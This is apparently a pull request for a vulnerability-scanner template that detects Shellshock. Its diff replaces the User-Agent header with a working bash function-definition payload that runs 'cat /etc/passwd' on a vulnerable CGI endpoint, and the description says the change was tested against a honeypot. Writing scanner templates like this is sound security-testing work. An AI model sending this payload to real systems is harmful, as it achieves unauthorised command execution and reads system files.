### PR TITLE
Improve shellshock payload

### DIFF
--- a/vulnerabilities/rce-shellshock-user-agent.yaml
+++ b/vulnerabilities/rce-shellshock-user-agent.yaml
@@ -8,7 +8,7 @@ info:
 requests:
  - method: GET
    headers:
-    User-Agent: "{ :;}; echo $(</etc/passwd)"
+    User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"
    path:
     - "{{BaseURL}}/cgi-bin/status"
    matchers:


### PR DESCRIPTION
The shellshock payload did not work against one of our vulnerable honeypots. Updated the payload to fix it.